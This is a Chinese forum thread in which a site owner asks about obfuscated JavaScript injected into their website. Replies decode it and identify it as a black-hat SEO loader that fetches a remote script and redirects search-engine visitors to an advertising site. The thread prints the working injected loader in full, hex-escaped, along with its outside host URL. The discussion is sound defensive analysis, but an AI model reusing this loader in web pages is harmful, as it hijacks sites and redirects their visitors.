网站多了一段加密js,麻烦帮看下是什么
;var head=document.getElementsByTagName('head');var script=document.createElement('script');script['src']='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73';head.appendChild(script); 把这些输入到浏览器控制台就能显示结果了"\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73"
结果:
"https://maccms.z23.web.core.windows.net/732d.js" 谢谢 不需要解密了 刚看到别人说的直接在网页中输出就可以了,查看了确实是广告代码 黑帽SEO的劫持代码
加载一个JS https://maccms.z23.web.core.windows.net/732d.js
指定搜索引擎 跳转指定网站
moz-extension://4e8fd867-55a7-4d0d-8a14-433c0c9b9d1a/icons/logo.png 对于网页JS加密。有控制台的浏览器可以把那段代码复制到控制台里,没有控制台的浏览器,在任意一个有js加密的网页的下方加入以下代码,运行后就可以在文本框中看到解密的内容。
<textarea name=jiemi></textarea>
<script>
jiemi.value=script;
</script> enchong 发表于 2021-1-31 01:25
谢谢 不需要解密了 刚看到别人说的直接在网页中输出就可以了,查看了确实是广告代码
请问怎么操作?直接在浏览器F12的console输入吗?我输入后提示错误啊 单引号中间一堆\x??的是16进制,console连单引号一起输入就可以了,
解码后是一个js
hxxps://maccms.z23.web.core.windows.net/732d.js(防止误点,协议做了处理)
打开js一眼看见一个网站,
hxxps://tsnpx110.com/
打开后发现是个咳咳广告。。。
{:301_1001:} 看了一下,JS根据网页response的关键字判断是否动态修改网页,加一些链接之类的 是通过JS实际的动态广告 大佬快回复
页:
[1]